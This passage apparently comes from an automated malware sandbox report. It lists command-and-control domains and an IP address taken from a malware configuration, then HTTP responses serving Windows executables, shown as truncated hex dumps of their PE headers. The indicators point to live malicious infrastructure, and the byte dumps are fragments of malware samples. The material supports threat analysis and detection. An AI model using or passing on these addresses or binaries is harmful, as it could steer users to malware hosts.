Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:20 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Wed, 23 Oct 2024 15:37:20 GMTConnection: keep-aliveETag: "67191830-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 5c be 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 37 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 36 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6f 69 6f 79 7a 67 74 00 50 1a 00 00 f0 31 00 00 48 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 61 63 6a 64 71 69 75 00 10 00 00 00 40 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:26 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:28 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Wed, 23 Oct 2024 15:44:06 GMTConnection: keep-aliveETag: "671919c6-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 de 72 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 73 64 6a 77 61 6c 69 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 72 6e 6d 63 78 63 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:39 GMTContent-Type: application/octet-streamContent-Length: 2891264Last-Modified: Wed, 23 Oct 2024 15:37:07 GMTConnection: keep-aliveETag: "67191823-2c1e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 a0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 2f 00 00 04 00 00 dc 94 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 75 6f 78 6e 62 72 6e 00 90 29 00 00 00 06 00 00 86 29 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6b 6b 71 68 65 74 77 00 10 00 00 00 90 2f 00 00 06 00 00 00 f6 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 2f 00 00 22 00 00 00 fc 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:45 GMTContent-Type: application/octet-streamContent-Length: 1833984Last-Modified: Wed, 23 Oct 2024 15:37:13 GMTConnection: keep-aliveETag: "67191829-1bfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 d1 e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 64 67 76 74 6a 71 00 a0 19 00 00 a0 4f 00 00 9a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 76 71 6a 6f 71 6d 00 10 00 00 00 40 69 00 00 04 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:51 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 23 Oct 2024 15:43:38 GMTConnection: keep-aliveETag: "671919aa-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a2 19 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 7e 75 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:51:56 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
